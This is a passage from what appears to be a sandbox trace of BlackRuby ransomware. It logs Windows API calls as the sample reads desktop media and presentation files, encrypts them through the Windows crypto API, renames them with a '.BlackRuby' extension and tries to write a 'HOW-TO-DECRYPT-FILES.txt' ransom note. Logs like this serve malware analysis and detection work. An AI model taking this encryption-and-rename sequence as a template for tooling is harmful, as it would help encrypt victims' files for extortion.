pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b56974*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.258] GetLastError () returned 0x0 [0056.258] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b569a4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b569a4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.258] GetLastError () returned 0x0 [0056.258] CryptDestroyKey (hKey=0x360fa0) returned 1 [0056.258] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.258] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.258] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4", lpFilePart=0x0) returned 0x2c [0056.258] GetLastError () returned 0x0 [0056.258] SetErrorMode (uMode=0x1) returned 0x0 [0056.258] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\tyetf2bdpdutv05.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.259] GetLastError () returned 0xb7 [0056.259] GetFileType (hFile=0x184) returned 0x1 [0056.259] SetErrorMode (uMode=0x0) returned 0x1 [0056.259] GetFileType (hFile=0x184) returned 0x1 [0056.259] WriteFile (in: hFile=0x184, lpBuffer=0x1b62420*, nNumberOfBytesToWrite=0x5d30, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x1b62420*, lpNumberOfBytesWritten=0x18ed90*=0x5d30, lpOverlapped=0x0) returned 1 [0056.260] GetLastError () returned 0xb7 [0056.260] CloseHandle (hObject=0x184) returned 1 [0056.261] GetLastError () returned 0xb7 [0056.261] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4", lpFilePart=0x0) returned 0x2c [0056.261] GetLastError () returned 0xb7 [0056.261] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_t6TIybjAEbRgdu3392HrbRDoEQRXpikNL13L16Acc7qNE0E.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_t6TIybjAEbRgdu3392HrbRDoEQRXpikNL13L16Acc7qNE0E.BlackRuby", lpFilePart=0x0) returned 0x5c [0056.261] GetLastError () returned 0xb7 [0056.261] SetErrorMode (uMode=0x1) returned 0x0 [0056.261] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\tyetf2bdpdutv05.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa45b2340, ftCreationTime.dwHighDateTime=0x1d34a7d, ftLastAccessTime.dwLowDateTime=0xaf8bfdb0, ftLastAccessTime.dwHighDateTime=0x1d35415, ftLastWriteTime.dwLowDateTime=0x29bacfa0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x5d30)) returned 1 [0056.261] GetLastError () returned 0xb7 [0056.261] SetErrorMode (uMode=0x0) returned 0x1 [0056.261] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\tyetf2bdpdutv05.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_t6TIybjAEbRgdu3392HrbRDoEQRXpikNL13L16Acc7qNE0E.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_t6tiybjaebrgdu3392hrbrdoeqrxpiknl13l16acc7qne0e.blackruby")) returned 1 [0056.262] GetLastError () returned 0xb7 [0056.263] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0056.263] GetLastError () returned 0xb7 [0056.263] SetErrorMode (uMode=0x1) returned 0x0 [0056.263] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.263] GetLastError () returned 0x5 [0056.264] SetErrorMode (uMode=0x0) returned 0x1 [0056.264] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt", lpFilePart=0x0) returned 0x2f [0056.264] GetLastError () returned 0x5 [0056.264] SetErrorMode (uMode=0x1) returned 0x0 [0056.264] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\u3jgdvgx2ygkkira5g.ppt"), fInfoLevelId=0x0, lpFileInformation=0x1b8524c | out: lpFileInformation=0x1b8524c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7a05a40, ftCreationTime.dwHighDateTime=0x1d34c8d, ftLastAccessTime.dwLowDateTime=0x6a3068e0, ftLastAccessTime.dwHighDateTime=0x1d35321, ftLastWriteTime.dwLowDateTime=0x6a3068e0, ftLastWriteTime.dwHighDateTime=0x1d35321, nFileSizeHigh=0x0, nFileSizeLow=0x780a)) returned 1 [0056.264] GetLastError () returned 0x5 [0056.264] SetErrorMode (uMode=0x0) returned 0x1 [0056.265] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt", lpFilePart=0x0) returned 0x2f [0056.265] GetLastError () returned 0x5 [0056.265] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt", lpFilePart=0x0) returned 0x2f [0056.265] GetLastError () returned 0x5 [0056.265] SetErrorMode (uMode=0x1) returned 0x0 [0056.265] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\u3jgdvgx2ygkkira5g.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.265] GetLastError () returned 0x0 [0056.265] GetFileType (hFile=0x184) returned 0x1 [0056.265] SetErrorMode (uMode=0x0) returned 0x1 [0056.265] GetFileType (hFile=0x184) returned 0x1 [0056.265] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x780a [0056.265] GetLastError () returned 0x0 [0056.265] ReadFile (in: hFile=0x184, lpBuffer=0x1b8721c, nNumberOfBytesToRead=0x780a, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b8721c*, lpNumberOfBytesRead=0x18ed84*=0x780a, lpOverlapped=0x0) returned 1 [0056.266] GetLastError () returned 0x0 [0056.266] CloseHandle (hObject=0x184) returned 1 [0056.266] GetLastError () returned 0x0 [0056.266] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt", lpFilePart=0x0) returned 0x2f [0056.266] GetLastError () returned 0x0 [0056.266] SetErrorMode (uMode=0x1) returned 0x0 [0056.266] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\u3jgdvgx2ygkkira5g.ppt"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7a05a40, ftCreationTime.dwHighDateTime=0x1d34c8d, ftLastAccessTime.dwLowDateTime=0x6a3068e0, ftLastAccessTime.dwHighDateTime=0x1d35321, ftLastWriteTime.dwLowDateTime=0x6a3068e0, ftLastWriteTime.dwHighDateTime=0x1d35321, nFileSizeHigh=0x0, nFileSizeLow=0x780a)) returned 1 [0056.266] GetLastError () returned 0x0 [0056.266] SetErrorMode (uMode=0x0) returned 0x1 [0056.266] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0056.267] GetLastError () returned 0x0 [0056.305] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1bf05fc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360da0) returned 1 [0056.305] GetLastError () returned 0x0 [0056.305] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.305] GetLastError () returned 0x0 [0056.310] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.310] GetLastError () returned 0x0 [0056.310] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e20) returned 1 [0056.310] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.310] GetLastError () returned 0x0 [0056.310] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1c1d648*=0x1, dwFlags=0x0) returned 1 [0056.310] GetLastError () returned 0x0 [0056.310] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1c1d614, dwFlags=0x0) returned 1 [0056.310] GetLastError () returned 0x0 [0056.310] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c1d690*, pdwDataLen=0x18ed74*=0x7900, dwBufLen=0x7900 | out: pbData=0x1c1d690*, pdwDataLen=0x18ed74*=0x7900) returned 1 [0056.310] GetLastError () returned 0x0 [0056.311] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c2c8bc*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c2c8bc*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.311] GetLastError () returned 0x0 [0056.311] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c2c8ec*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c2c8ec*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.311] GetLastError () returned 0x0 [0056.311] CryptDestroyKey (hKey=0x360da0) returned 1 [0056.311] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0056.311] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0056.311] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt", lpFilePart=0x0) returned 0x2f [0056.311] GetLastError () returned 0x0 [0056.311] SetErrorMode (uMode=0x1) returned 0x0 [0056.311] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\u3jgdvgx2ygkkira5g.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.312] GetLastError () returned 0xb7 [0056.312] GetFileType (hFile=0x184) returned 0x1 [0056.312] SetErrorMode (uMode=0x0) returned 0x1 [0056.312] GetFileType (hFile=0x184) returned 0x1 [0056.313] CloseHandle (hObject=0x184) returned 1 [0056.313] GetLastError () returned 0xb7 [0056.313] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt", lpFilePart=0x0) returned 0x2f [0056.313] GetLastError () returned 0xb7 [0056.313] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_HSJkwwm93AQgIJ2Uytg8RqOwovHNaWAF0BQroYKBVPS.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_HSJkwwm93AQgIJ2Uytg8RqOwovHNaWAF0BQroYKBVPS.BlackRuby", lpFilePart=0x0) returned 0x58 [0056.313] GetLastError () returned 0xb7 [0056.313] SetErrorMode (uMode=0x1) returned 0x0 [0056.314] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\u3jgdvgx2ygkkira5g.ppt"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7a05a40, ftCreationTime.dwHighDateTime=0x1d34c8d, ftLastAccessTime.dwLowDateTime=0x6a3068e0, ftLastAccessTime.dwHighDateTime=0x1d35321, ftLastWriteTime.dwLowDateTime=0x29c1f3c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x7910)) returned 1 [0056.314] GetLastError () returned 0xb7 [0056.314] SetErrorMode (uMode=0x0) returned 0x1 [0056.314] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\U3jGDvgX2YgkkirA5g.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\u3jgdvgx2ygkkira5g.ppt"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_HSJkwwm93AQgIJ2Uytg8RqOwovHNaWAF0BQroYKBVPS.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_hsjkwwm93aqgij2uytg8rqowovhnawaf0bqroykbvps.blackruby")) returned 1 [0056.314] GetLastError () returned 0xb7 [0056.315] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0056.315] GetLastError () returned 0xb7 [0056.315] SetErrorMode (uMode=0x1) returned 0x0 [0056.315] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.315] GetLastError () returned 0x5 [0056.316] SetErrorMode (uMode=0x0) returned 0x1 [0056.316] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv", lpFilePart=0x0) returned 0x29 [0056.316] GetLastError () returned 0x5 [0056.316] SetErrorMode (uMode=0x1) returned 0x0 [0056.316] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\v1ax lne0_k6.mkv"), fInfoLevelId=0x0, lpFileInformation=0x1c60538 | out: lpFileInformation=0x1c60538*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ee8ba40, ftCreationTime.dwHighDateTime=0x1d350aa, ftLastAccessTime.dwLowDateTime=0xfc089950, ftLastAccessTime.dwHighDateTime=0x1d35064, ftLastWriteTime.dwLowDateTime=0xfc089950, ftLastWriteTime.dwHighDateTime=0x1d35064, nFileSizeHigh=0x0, nFileSizeLow=0x5c56)) returned 1 [0056.316] GetLastError () returned 0x5 [0056.316] SetErrorMode (uMode=0x0) returned 0x1 [0056.316] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv", lpFilePart=0x0) returned 0x29 [0056.316] GetLastError () returned 0x5 [0056.316] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv", lpFilePart=0x0) returned 0x29 [0056.316] GetLastError () returned 0x5 [0056.316] SetErrorMode (uMode=0x1) returned 0x0 [0056.316] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\v1ax lne0_k6.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.316] GetLastError () returned 0x0 [0056.316] GetFileType (hFile=0x184) returned 0x1 [0056.316] SetErrorMode (uMode=0x0) returned 0x1 [0056.317] GetFileType (hFile=0x184) returned 0x1 [0056.317] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x5c56 [0056.317] GetLastError () returned 0x0 [0056.317] ReadFile (in: hFile=0x184, lpBuffer=0x1c62394, nNumberOfBytesToRead=0x5c56, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c62394*, lpNumberOfBytesRead=0x18ed84*=0x5c56, lpOverlapped=0x0) returned 1 [0056.317] GetLastError () returned 0x0 [0056.317] CloseHandle (hObject=0x184) returned 1 [0056.317] GetLastError () returned 0x0 [0056.317] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv", lpFilePart=0x0) returned 0x29 [0056.317] GetLastError () returned 0x0 [0056.317] SetErrorMode (uMode=0x1) returned 0x0 [0056.318] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\v1ax lne0_k6.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ee8ba40, ftCreationTime.dwHighDateTime=0x1d350aa, ftLastAccessTime.dwLowDateTime=0xfc089950, ftLastAccessTime.dwHighDateTime=0x1d35064, ftLastWriteTime.dwLowDateTime=0xfc089950, ftLastWriteTime.dwHighDateTime=0x1d35064, nFileSizeHigh=0x0, nFileSizeLow=0x5c56)) returned 1 [0056.318] GetLastError () returned 0x0 [0056.318] SetErrorMode (uMode=0x0) returned 0x1 [0056.328] CryptImportKey (in: hProv=0x37c790, pbData=0x1cc7fec, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360f20) returned 1 [0056.328] GetLastError () returned 0x0 [0056.328] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.328] GetLastError () returned 0x0 [0056.333] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.333] GetLastError () returned 0x0 [0056.333] CryptDuplicateKey (in: hKey=0x360f20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360c20) returned 1 [0056.333] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.333] GetLastError () returned 0x0 [0056.333] CryptSetKeyParam (hKey=0x360c20, dwParam=0x4, pbData=0x1cf5038*=0x1, dwFlags=0x0) returned 1 [0056.333] GetLastError () returned 0x0 [0056.333] CryptSetKeyParam (hKey=0x360c20, dwParam=0x1, pbData=0x1cf5004, dwFlags=0x0) returned 1 [0056.333] GetLastError () returned 0x0 [0056.333] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cf5080*, pdwDataLen=0x18ed74*=0x5d50, dwBufLen=0x5d50 | out: pbData=0x1cf5080*, pdwDataLen=0x18ed74*=0x5d50) returned 1 [0056.333] GetLastError () returned 0x0 [0056.333] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d00b4c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d00b4c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.333] GetLastError () returned 0x0 [0056.333] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d00b7c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d00b7c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.333] GetLastError () returned 0x0 [0056.334] CryptDestroyKey (hKey=0x360f20) returned 1 [0056.334] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.334] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.334] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv", lpFilePart=0x0) returned 0x29 [0056.334] GetLastError () returned 0x0 [0056.334] SetErrorMode (uMode=0x1) returned 0x0 [0056.335] GetFileType (hFile=0x184) returned 0x1 [0056.335] GetFileType (hFile=0x184) returned 0x1 [0056.336] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\V1ax LNe0_k6.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\v1ax lne0_k6.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_mc9V9Yrpz4KIDVkpU9UEjcTSPTm6dVIjIFQxARSUHjfV.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_mc9v9yrpz4kidvkpu9uejctsptm6dvijifqxarsuhjfv.blackruby")) returned 1 [0056.337] GetLastError () returned 0xb7 [0056.338] SetErrorMode (uMode=0x0) returned 0x1 [0056.338] GetFileType (hFile=0x184) returned 0x1 [0056.338] GetFileType (hFile=0x184) returned 0x1 [0056.338] ReadFile (in: hFile=0x184, lpBuffer=0x1d310b4, nNumberOfBytesToRead=0x675a, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1d310b4*, lpNumberOfBytesRead=0x18ed84*=0x675a, lpOverlapped=0x0) returned 1 [0056.339] GetLastError () returned 0x0 [0056.377] CryptImportKey (in: hProv=0x37c708, pbData=0x1b9330c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x3609e0) returned 1 [0056.377] GetLastError () returned 0x0 [0056.377] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.377] GetLastError () returned 0x0 [0056.382] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.382] GetLastError () returned 0x0 [0056.382] CryptDuplicateKey (in: hKey=0x3609e0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b60) returned 1 [0056.382] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.382] GetLastError () returned 0x0 [0056.382] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1bc0358*=0x1, dwFlags=0x0) returned 1 [0056.382] GetLastError () returned 0x0 [0056.382] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1bc0324, dwFlags=0x0) returned 1 [0056.382] GetLastError () returned 0x0 [0056.382] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bc03a0*, pdwDataLen=0x18ed74*=0x6850, dwBufLen=0x6850 | out: pbData=0x1bc03a0*, pdwDataLen=0x18ed74*=0x6850) returned 1 [0056.382] GetLastError () returned 0x0 [0056.382] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bcd46c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bcd46c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.382] GetLastError () returned 0x0 [0056.383] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bcd49c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bcd49c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.383] GetLastError () returned 0x0 [0056.383] CryptDestroyKey (hKey=0x3609e0) returned 1 [0056.383] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.383] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.383] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WIyMiI73.gif", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\WIyMiI73.gif", lpFilePart=0x0) returned 0x25 [0056.383] GetLastError () returned 0x0 [0056.383] SetErrorMode (uMode=0x1) returned 0x0 [0056.383] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WIyMiI73.gif" (normalized: "c:\\users\\eebsym5\\desktop\\wiymii73.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.384] GetLastError () returned 0xb7 [0056.384] GetFileType (hFile=0x184) returned 0x1 [0056.384] SetErrorMode (uMode=0x0) returned 0x1 [0056.384] GetFileType (hFile=0x184) returned 0x1 [0056.385] CloseHandle (hObject=0x184) returned 1 [0056.385] GetLastError () returned 0xb7 [0056.385] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\WIyMiI73.gif", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\WIyMiI73.gif", lpFilePart=0x0) returned 0x25 [0056.385] GetLastError () returned 0xb7 [0056.385] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_Ayxx7tumndJIsujHK1sTa3eazzbvPJib7QoTyvc4.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_Ayxx7tumndJIsujHK1sTa3eazzbvPJib7QoTyvc4.BlackRuby", 